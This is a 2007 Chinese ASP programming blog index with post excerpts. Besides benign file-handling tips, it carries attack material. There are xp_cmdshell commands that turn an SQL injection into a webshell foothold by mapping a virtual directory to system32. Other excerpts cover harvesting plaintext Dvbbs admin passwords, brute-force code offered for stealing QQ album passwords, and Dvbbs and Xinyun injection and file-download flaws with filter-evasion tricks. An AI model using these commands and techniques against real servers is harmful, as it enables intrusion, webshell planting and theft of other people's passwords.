asp.net C# 痕风

所有的开心与痛苦都会随风飘向远方,
什么也不会留下.
唯有未干的双眼让人们知道发生过.
还有小小
  博客园 :: 首页 :: 联系 :: 订阅 订阅 :: 管理
  36 Posts :: 23 Stories :: 18 Comments :: 1 Trackbacks

asp相关资料

asp相关资料 动网 bbs dvbbs
硬盘文件搜索代码(ASP类)
     摘要: 硬盘文件的类SearchFile *************
'*************调用方法: *************
'*************Set newsearch=new SearchFile '声明 *************
'*************newsearch.Folder="F:+E:"'传入搜索源*************
'*************newsearch.keyword="汇编" '关键词*************
'*************newsearch.Search '开始搜索*************
'*************Set newsearch=Nothing '结束*************  阅读全文
posted @ 2007-10-30 15:59 何随风 阅读(44) | 评论 (0)  编辑

用ADODB.Stream代替FSO读取文本文件
     摘要: 用ADODB.Stream代替FSO读取文本文件  阅读全文
posted @ 2007-09-07 09:26 何随风 阅读(118) | 评论 (0)  编辑

asp中操作UTF-8格式的文件
     摘要: asp中操作UTF-8格式的文件  阅读全文
posted @ 2007-09-07 09:22 何随风 阅读(27) | 评论 (0)  编辑

ASP脚本那么玩才对
posted @ 2007-05-24 10:31 何随风 阅读(634) | 评论 (1)  编辑

sql注入绝技--建立虚拟目录
     摘要: sql注入建立虚拟目录,免得找web绝对路径
----------------------------------------------------------------
我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdsh  阅读全文
posted @ 2007-05-24 10:28 何随风 阅读(25) | 评论 (0)  编辑

动网数据库中获取密码又一法
     摘要: 在动网的数据库中,表DV_LOG以明文形式存放了管理员登陆的密码,参数password2后面的值即是管理员的明文密码。如果遇到用URL ENCODE加密过的密码,可以查阅ASCII码表来得到正确的密码  阅读全文
posted @ 2007-05-24 10:10 何随风 阅读(54) | 评论 (0)  编辑

ASP代码破解登陆密码
     摘要: ASP代码破解登陆密码
代码完全来自黑客防线10月份的文章内容,本站未做任何修改(只实用于盗QQ像册的密码).如果时间允许的话,我会给大家一个通用的暴力破解的代码!~  阅读全文
posted @ 2007-05-24 09:58 何随风 阅读(263) | 评论 (1)  编辑

动网7.1.0存在泄露绝对路径漏洞
     摘要: 厂商名字:动网先锋论谈
厂商地址:http://www.dvbbs.net/
漏洞程序:Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。  阅读全文
posted @ 2007-05-24 09:55 何随风 阅读(26) | 评论 (0)  编辑

新云2.1下载任意文件漏洞
     摘要: 在新云2.1版本中,flash/downfile.asp过滤不严导致可下载任意文件。

url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")

变量URL从客户端提交的路径获取,仅过滤了"'","%"和"\"
看下面   阅读全文
posted @ 2007-05-24 09:50 何随风 阅读(169) | 评论 (1)  编辑

动网7.1 BOKE漏洞分析
     摘要: 原因是Cls_Main.asp中获得boke.asp参数是通过以下语句实现的
bbs\boke\目录 Cls_Main.asp文件第34行
ArchiveLink = Lcase(Request.ServerVariables("QUERY_STRING"))
ArchiveLink 中的字符以utf-8方式编码,中文等都被转化成%xx%xx形式,空格也被转化为%20
所以当时写的 ASP利用程序 中的“'”与关键字“and”中间没写空格,为的就是避开%20
后来在www.cnbct.org看到可以使用“/**/”注释语法 或“%09”来避开空格,
避开空格后,用Update语句就可以轻松获得DVBBS V7.1 SP1 SQL版的后台控制权限  阅读全文
posted @ 2007-05-24 09:46 何随风 阅读(213) | 评论 (0)  编辑